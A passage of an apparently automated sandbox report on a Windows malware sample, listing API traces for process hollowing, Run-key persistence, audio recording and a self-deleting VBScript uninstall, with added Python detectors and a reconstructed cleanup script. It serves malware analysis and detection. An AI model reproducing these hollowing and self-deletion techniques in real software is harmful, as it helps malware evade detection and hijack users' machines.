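The call list above is the classic process-hollowing sequence: CreateProcessW with dwCreationFlags 0x00000004 (CREATE_SUSPENDED) in the sixth argument, GetThreadContext and ReadProcessMemory to locate the target image, WriteProcessMemory, SetThreadContext and ResumeThread to run the replacement, with TerminateProcess on the failure paths. Note that the Zw* section routines are resolved through GetModuleHandleA/GetProcAddress, so the report logs only the resolution by name and never a direct ZwUnmapViewOfSection call. The following Python is an added example, not part of the Joe Sandbox report or of the sample: it parses API lines in the report's own "• Api.MODULE(args), ref: ADDR" layout and flags the hollowing pattern, treating a dynamically resolved Nt/ZwUnmapViewOfSection as evidence in its own right. The hollowing trace is copied from the listing above; the benign trace is a constructed, hypothetical launcher used as a negative case.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Sample input copied from the report's API listing for the hollowing function.
HOLLOWING_TRACE = """\
• GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 000D728C
• GetProcAddress.KERNEL32(00000000), ref: 000D728F
• GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 000D72A0
• GetProcAddress.KERNEL32(00000000), ref: 000D72A3
• GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 000D72B4
• GetProcAddress.KERNEL32(00000000), ref: 000D72B7
• GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 000D72C8
• GetProcAddress.KERNEL32(00000000), ref: 000D72CB
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 000D736C
• VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 000D7384
• GetThreadContext.KERNEL32(?,00000000), ref: 000D739A
• ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 000D73C0
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 000D7440
• TerminateProcess.KERNEL32(?,00000000), ref: 000D7454
• GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 000D748B
• WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 000D7558
• SetThreadContext.KERNEL32(?,00000000), ref: 000D7575
• ResumeThread.KERNEL32(?), ref: 000D7582
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 000D759A
• GetCurrentProcess.KERNEL32(?), ref: 000D75A5
• TerminateProcess.KERNEL32(?,00000000), ref: 000D75BF
• GetLastError.KERNEL32 ref: 000D75C7
"""

# Constructed negative sample (hypothetical launcher): a suspended create that is
# resumed without writing a foreign image, as a debugger or job wrapper would do.
BENIGN_TRACE = """\
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00401000
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401020
• ResumeThread.KERNEL32(?), ref: 00401030
• CloseHandle.KERNEL32(?), ref: 00401040
"""

CREATE_SUSPENDED = 0x00000004  # dwCreationFlags bit seen in the sixth CreateProcessW argument
UNMAP_NAMES = ("NtUnmapViewOfSection", "ZwUnmapViewOfSection")

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str


def parse_trace(text: str) -> List[ApiCall]:
    """Parse the report's '• Api.MODULE(arg,arg), ref: ADDR' lines; non-matching lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = m.group("args")
        calls.append(ApiCall(m.group("api"), m.group("mod"),
                             args.split(",") if args else [], m.group("ref")))
    return calls


def _flags(arg: str) -> Optional[int]:
    """Hex argument to int; '?' means the sandbox could not recover the value."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def detect_process_hollowing(calls: List[ApiCall]) -> Optional[dict]:
    """Return evidence when the sequence matches hollowing, else None.

    Required, in order after a CREATE_SUSPENDED CreateProcess*: WriteProcessMemory,
    SetThreadContext, ResumeThread. Unmapping the original image is reported as
    'direct' (the Nt/Zw call itself is logged) or 'dynamic' (only resolved by name
    through GetModuleHandle*/GetProcAddress/LoadLibrary*), or None if absent.
    """
    create_idx = None
    for i, c in enumerate(calls):
        if c.api.startswith("CreateProcess") and len(c.args) >= 6:
            flags = _flags(c.args[5])
            if flags is not None and flags & CREATE_SUSPENDED:
                create_idx = i
                break
    if create_idx is None:
        return None

    evidence = {"suspended_create": calls[create_idx].ref}
    want = ["WriteProcessMemory", "SetThreadContext", "ResumeThread"]
    for c in calls[create_idx + 1:]:
        if want and c.api == want[0]:
            evidence[want.pop(0)] = c.ref
    if want:
        return None

    unmap = None
    for c in calls:
        if c.api in UNMAP_NAMES:
            unmap = "direct"
        elif c.api.startswith(("GetModuleHandle", "GetProcAddress", "LoadLibrary")) \
                and any(a.strip() in UNMAP_NAMES for a in c.args):
            unmap = unmap or "dynamic"
    evidence["unmap"] = unmap
    return evidence


if __name__ == "__main__":
    print(detect_process_hollowing(parse_trace(HOLLOWING_TRACE)))
    print(detect_process_hollowing(parse_trace(BENIGN_TRACE)))
```

The detector keys on the write/context/resume triple rather than on the unmap alone, because an argument the sandbox could not recover is printed as "?" and a loader may allocate fresh memory in the child instead of unmapping; the unmap evidence is kept as a separate field so an analyst can see which variant was observed.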
                                              APIs
                                                • Part of subcall function 000D1699: TerminateProcess.KERNEL32(00000000,pth_unenc,000CE670), ref: 000D16A9
                                                • Part of subcall function 000D1699: WaitForSingleObject.KERNEL32(000000FF), ref: 000D16BC
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 000CC38B
                                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 000CC39E
                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 000CC3B7
                                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 000CC3E7
                                                • Part of subcall function 000CAFBA: TerminateThread.KERNEL32(000C99A9,00000000,001342F8,pth_unenc,000CBF26,001342E0,001342F8,?,pth_unenc), ref: 000CAFC9
                                                • Part of subcall function 000CAFBA: UnhookWindowsHookEx.USER32(001340F8), ref: 000CAFD5
                                                • Part of subcall function 000CAFBA: TerminateThread.KERNEL32(000C9993,00000000,?,pth_unenc), ref: 000CAFE3
                                                • Part of subcall function 000DB58F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00125900,00000000,00000000,000CC267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 000DB5CE
                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00125900,00125900,00000000), ref: 000CC632
                                              • ExitProcess.KERNEL32 ref: 000CC63E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                              • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                              • API String ID: 1861856835-1536747724
                                              • Opcode ID: 5b15bcc04b835abc96019a69f7b2ee4b8556b099e8a9d3a3956f93d8044b15c3
                                              • Instruction ID: 27464f35a9679b82e6607bac89509a20af68e1d3cffeacfea77022a24bfd0e3d
                                              • Opcode Fuzzy Hash: 5b15bcc04b835abc96019a69f7b2ee4b8556b099e8a9d3a3956f93d8044b15c3
                                              • Instruction Fuzzy Hash: E9915F316042505BD318FB20E852FEFB7A9AF96710F50852DF48A971D3EF70AE498662
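The strings of the function above describe the uninstall path: the Run and Policies\Explorer\Run keys are deleted, the file attributes are cleared, and a script written to %Temp%\update.vbs is launched through ShellExecuteW before ExitProcess. Its fragments (On Error Resume Next, Scripting.FileSystemObject, a "while fso.FileExists(... fso.DeleteFile ... wend" retry loop, fso.DeleteFolder and fso.DeleteFile(Wscript.ScriptFullName)) are the usual self-deleting cleanup. The following Python is an added triage helper, not part of the report or of the sample: it scores a dropped .vbs against those fragments and lists the paths the script deletes, which is what an incident responder wants when the executable itself has already been removed. The sample script is constructed from the report's fragments; its line order and the target path are assumptions.

```python
import re
from typing import Dict, List

# Constructed sample: assembled from the fragments in the report strings above.
# Line order and the deleted path are assumptions, not recovered from the sample.
SAMPLE_UPDATE_VBS = r'''On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
while fso.FileExists("C:\Users\user\Desktop\4wECQoBvYC.exe")
fso.DeleteFile "C:\Users\user\Desktop\4wECQoBvYC.exe"
wend
fso.DeleteFile(Wscript.ScriptFullName)
'''

# Constructed benign comparison: a one-shot cleanup that neither loops nor deletes itself.
SAMPLE_BENIGN_VBS = r'''Set fso = CreateObject("Scripting.FileSystemObject")
If fso.FileExists("C:\Temp\report.txt") Then fso.DeleteFile "C:\Temp\report.txt"
'''

# VBScript is case-insensitive, so every pattern is compiled with re.I.
INDICATORS = {
    "fso":            re.compile(r'CreateObject\("Scripting\.FileSystemObject"\)', re.I),
    "retry_loop":     re.compile(r'while\s+fso\.FileExists\(.*?\)[\s\S]*?fso\.DeleteFile[\s\S]*?\bwend\b', re.I),
    "self_delete":    re.compile(r'fso\.DeleteFile\s*\(?\s*Wscript\.ScriptFullName', re.I),
    "folder_delete":  re.compile(r'fso\.DeleteFolder\s+"', re.I),
    "hidden_shell":   re.compile(r'CreateObject\("WScript\.Shell"\)\.Run\s+"cmd /c', re.I),
    "swallow_errors": re.compile(r'^\s*On Error Resume Next', re.I | re.M),
}


def deleted_targets(text: str) -> List[str]:
    """Quoted paths passed to fso.DeleteFile / fso.DeleteFolder."""
    return re.findall(r'fso\.Delete(?:File|Folder)\s+"([^"]+)"', text, re.I)


def triage_vbs(text: str) -> Dict:
    """Score a dropped script; the retry loop plus self-deletion is the decisive pair."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    decisive = {"retry_loop", "self_delete"} <= set(hits)
    return {
        "indicators": hits,
        "targets": sorted(set(deleted_targets(text))),
        "verdict": "self-deleting dropper cleanup" if decisive else "no match",
    }


if __name__ == "__main__":
    print(triage_vbs(SAMPLE_UPDATE_VBS))
    print(triage_vbs(SAMPLE_BENIGN_VBS))
```

Run it over every .vbs found under the user's Temp directory (and the WScript/CScript command lines from process logs, since the Sigma rules in this report fire on exactly that launch); the "targets" list recovers the original executable path even when the file is gone, and the retry loop is the tell that the script was waiting for the parent process to exit.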
                                              APIs
                                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,001342F8,?,00000000), ref: 000D12D4
                                              • ExitProcess.KERNEL32 ref: 000D151D
                                                • Part of subcall function 000D265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,001342F8), ref: 000D2679
                                                • Part of subcall function 000D265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 000D2692
                                                • Part of subcall function 000D265D: RegCloseKey.KERNEL32(00000000), ref: 000D269D
                                                • Part of subcall function 000DB61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,000C9F65), ref: 000DB633
                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 000D135B
                                              • OpenProcess.KERNEL32(00100000,00000000,000CE154,?,?,?,?,00000000), ref: 000D136A
                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 000D1375
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 000D137C
                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 000D1382
                                                • Part of subcall function 000D27D5: RegCreateKeyA.ADVAPI32(80000001,00000000,00125554), ref: 000D27E3
                                                • Part of subcall function 000D27D5: RegSetValueExA.KERNEL32(00125554,000000AF,00000000,00000004,00000001,00000004,?,?,?,000CB94C,001260E0,00000001,000000AF,00125554), ref: 000D27FE
                                                • Part of subcall function 000D27D5: RegCloseKey.ADVAPI32(00125554,?,?,?,000CB94C,001260E0,00000001,000000AF,00125554), ref: 000D2809
                                              • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 000D13B3
                                              • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 000D140F
                                              • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 000D1429
                                              • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 000D143B
                                                • Part of subcall function 000DB58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 000DB5EB
                                                • Part of subcall function 000DB58F: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 000DB5FF
                                                • Part of subcall function 000DB58F: CloseHandle.KERNEL32(00000000), ref: 000DB60C
                                              • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 000D1483
                                              • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 000D14C4
                                              • OpenProcess.KERNEL32(00100000,00000000,000CE154,?,?,?,?,00000000), ref: 000D14D9
                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 000D14E4
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 000D14EB
                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 000D14F1
                                                • Part of subcall function 000DB58F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00125900,00000000,00000000,000CC267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 000DB5CE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                              • String ID: .exe$WDH$exepath$open$temp_
                                              • API String ID: 4250697656-3088914985
                                              • Opcode ID: f940d88ba5af400abefb8a1d458741a7d33199d07081e77186885a340ef57306
                                              • Instruction ID: c5672f7dbf8bca72b630ad87df9a32fa59a3f0f56887c22fc4e70de94dc77945
                                              • Opcode Fuzzy Hash: f940d88ba5af400abefb8a1d458741a7d33199d07081e77186885a340ef57306
                                              • Instruction Fuzzy Hash: 0D51C371A04319BBDB14ABA0AD49FFE73BD9B45710F004196B901A77C2DF749E868B60
                                              APIs
                                              • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 000DA2B2
                                              • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 000DA2C6
                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00125554), ref: 000DA2EE
                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00133EE8,00000000), ref: 000DA2FF
                                              • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 000DA340
                                              • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 000DA358
                                              • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 000DA36D
                                              • SetEvent.KERNEL32 ref: 000DA38A
                                              • WaitForSingleObject.KERNEL32(000001F4), ref: 000DA39B
                                              • CloseHandle.KERNEL32 ref: 000DA3AB
                                              • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 000DA3CD
                                              • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 000DA3D7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                              • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                              • API String ID: 738084811-1354618412
                                              • Opcode ID: 421e333c1a9d4b630579bc4e74de74020b0b802999bba84228c61cf92f7b1a14
                                              • Instruction ID: b2e19992fc6a190b85f1924039c5cb656e988cb0799aa7860421e2d160c09493
                                              • Opcode Fuzzy Hash: 421e333c1a9d4b630579bc4e74de74020b0b802999bba84228c61cf92f7b1a14
                                              • Instruction Fuzzy Hash: 3551BE71248304ABD214BB20EC92EFF3BADAB92354F10042EF456926A3DF705E598662
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 000C1C54
                                              • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 000C1C7E
                                              • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 000C1C8E
                                              • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 000C1C9E
                                              • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 000C1CAE
                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 000C1CBE
                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 000C1CCF
                                              • WriteFile.KERNEL32(00000000,00131B02,00000002,00000000,00000000), ref: 000C1CE0
                                              • WriteFile.KERNEL32(00000000,00131B04,00000004,00000000,00000000), ref: 000C1CF0
                                              • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 000C1D00
                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 000C1D11
                                              • WriteFile.KERNEL32(00000000,00131B0E,00000002,00000000,00000000), ref: 000C1D22
                                              • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 000C1D32
                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 000C1D42
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$Write$Create
                                              • String ID: RIFF$WAVE$data$fmt
                                              • API String ID: 1602526932-4212202414
                                              • Opcode ID: 0efa78d77268bb9b7527240d373889f7fe0ceca9392834ac1df86ee3be78deb4
                                              • Instruction ID: 65cd053e945d326fdb9142f1c3b240a97d094562dc85f1775ff57f91cc2b1033
                                              • Opcode Fuzzy Hash: 0efa78d77268bb9b7527240d373889f7fe0ceca9392834ac1df86ee3be78deb4
                                              • Instruction Fuzzy Hash: 79414071544318BAE210DB51DD86FBBBEECEB85B54F40041AF644D60C0E7A4E909DBB3
                                              APIs
                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\4wECQoBvYC.exe,00000001,000C68B2,C:\Users\user\Desktop\4wECQoBvYC.exe,00000003,000C68DA,001342E0,000C6933), ref: 000C64F4
                                              • GetProcAddress.KERNEL32(00000000), ref: 000C64FD
                                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 000C650E
                                              • GetProcAddress.KERNEL32(00000000), ref: 000C6511
                                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 000C6522
                                              • GetProcAddress.KERNEL32(00000000), ref: 000C6525
                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 000C6536
                                              • GetProcAddress.KERNEL32(00000000), ref: 000C6539
                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 000C654A
                                              • GetProcAddress.KERNEL32(00000000), ref: 000C654D
                                              • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 000C655E
                                              • GetProcAddress.KERNEL32(00000000), ref: 000C6561
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressHandleModuleProc
                                              • String ID: C:\Users\user\Desktop\4wECQoBvYC.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                              • API String ID: 1646373207-3181818924
                                              • Opcode ID: cc73661e5a8020ed21c52eb556184e61303ac35b492b4268d923dc3cd2b09119
                                              • Instruction ID: 2e248e24efbae66b12708185874958a3348acdc565b06f2de06c33c40dcc25de
                                              • Opcode Fuzzy Hash: cc73661e5a8020ed21c52eb556184e61303ac35b492b4268d923dc3cd2b09119
                                              • Instruction Fuzzy Hash: 48012CA4E50B2675DB316B7B6C94E1BAEFD9F503A0318082BA401E35A5EFB8C4408E74
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 0040A20D
                                                • Part of subcall function 0040A0F2: __EH_prolog.LIBCMT ref: 0040A0F7
                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000), ref: 0040A347
                                                • Part of subcall function 0040953E: __EH_prolog.LIBCMT ref: 00409543
                                              • OpenServiceA.ADVAPI32(00000000,PnkBstrA,000F01FF,?,00000000), ref: 0040A47A
                                              • CloseServiceHandle.ADVAPI32(?,?,00000000), ref: 0040A4AD
                                              • CloseServiceHandle.ADVAPI32(00000000,?,00000000), ref: 0040A4B6
                                              Strings
                                              • &Test Services, xrefs: 0040A3E9
                                              • Install/Re-Install PunkBuster Service, xrefs: 0040A258
                                              • staticText, xrefs: 0040A4D2
                                              • **ERROR: Cannot open a handle to the service control manager. Please make sure you are the administrator for this computer., xrefs: 0040A36E
                                              • PnkBstrA, xrefs: 0040A472
                                              • button, xrefs: 0040A3D8
                                              • Un-Install/Remove PunkBuster Service, xrefs: 0040A269
                                              • Message, xrefs: 0040A361
                                              • , xrefs: 0040A52A
                                              • This program will help you install or un-install the PunkBuster Anti-cheat service.Please make your selection and then click "Next" to continue., xrefs: 0040A4E3
                                              • radioBox, xrefs: 0040A291
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: H_prologService$CloseHandleOpen$Manager
                                              • String ID: This program will help you install or un-install the PunkBuster Anti-cheat service.Please make your selection and then click "Next" to continue.$ $ **ERROR: Cannot open a handle to the service control manager. Please make sure you are the administrator for this computer.$&Test Services$Install/Re-Install PunkBuster Service$Message$PnkBstrA$Un-Install/Remove PunkBuster Service$button$radioBox$staticText
                                              • API String ID: 81804430-3789358379
                                              • Opcode ID: c08c51f1ec922e4f2c132f83c3c504c1061ff5f93906ae0e8dfd2920e58565db
                                              • Instruction ID: 9234b14ef658502d59a1c728953b6f4821128c5ba5519474f5c4182507258a31
                                              • Opcode Fuzzy Hash: c08c51f1ec922e4f2c132f83c3c504c1061ff5f93906ae0e8dfd2920e58565db
                                              • Instruction Fuzzy Hash: 48C18D70900349AEDB10EFA5CC46BEFBBB4AF04308F50456EF555B62D2CBB85A44CB69
                                              APIs
                                              • _wcslen.LIBCMT ref: 000CBC75
                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00134358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 000CBC8E
                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\4wECQoBvYC.exe,00000000,00000000,00000000,00000000,00000000,?,00134358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 000CBD3E
                                              • _wcslen.LIBCMT ref: 000CBD54
                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 000CBDDC
                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\4wECQoBvYC.exe,00000000,00000000), ref: 000CBDF2
                                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 000CBE31
                                              • _wcslen.LIBCMT ref: 000CBE34
                                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 000CBE4B
                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00134358,0000000E), ref: 000CBE9B
                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00125900,00125900,00000001), ref: 000CBEB9
                                              • ExitProcess.KERNEL32 ref: 000CBED0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                              • String ID: 6$C:\Users\user\Desktop\4wECQoBvYC.exe$del$open
                                              • API String ID: 1579085052-641206610
                                              • Opcode ID: 781117e5e64a8f41af36e5f09c31d274e5268e466970229a7fcf079e879e9c33
                                              • Instruction ID: fe353b61d0c55e862c33df69c5306452bd0bc17c264a97bf325dfd7a1f1a14a1
                                              • Opcode Fuzzy Hash: 781117e5e64a8f41af36e5f09c31d274e5268e466970229a7fcf079e879e9c33
                                              • Instruction Fuzzy Hash: A951CE316042406BD618B720EC53FFF7BA9AF96B10F50041CF986D72C3DF64AD4582A6
                                              APIs
                                              • lstrlenW.KERNEL32(?), ref: 000DB1D6
                                              • _memcmp.LIBVCRUNTIME ref: 000DB1EE
                                              • lstrlenW.KERNEL32(?), ref: 000DB207
                                              • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 000DB242
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 000DB255
                                              • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 000DB299
                                              • lstrcmpW.KERNEL32(?,?), ref: 000DB2B4
                                              • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 000DB2CC
                                              • _wcslen.LIBCMT ref: 000DB2DB
                                              • FindVolumeClose.KERNEL32(?), ref: 000DB2FB
                                              • GetLastError.KERNEL32 ref: 000DB313
                                              • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 000DB340
                                              • lstrcatW.KERNEL32(?,?), ref: 000DB359
                                              • lstrcpyW.KERNEL32(?,?), ref: 000DB368
                                              • GetLastError.KERNEL32 ref: 000DB370
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                              • String ID: ?
                                              • API String ID: 3941738427-1684325040
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00406666
                                                • Part of subcall function 0040649F: __EH_prolog.LIBCMT ref: 004064A4
                                                • Part of subcall function 0040649F: 80000006.COMCTL32(?,?,?,?,?,?,?,?,00000001,?,00000401), ref: 00406630
                                              • 80000006.COMCTL32(?), ref: 004069DD
                                              • 80000006.COMCTL32(?), ref: 004069E2
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
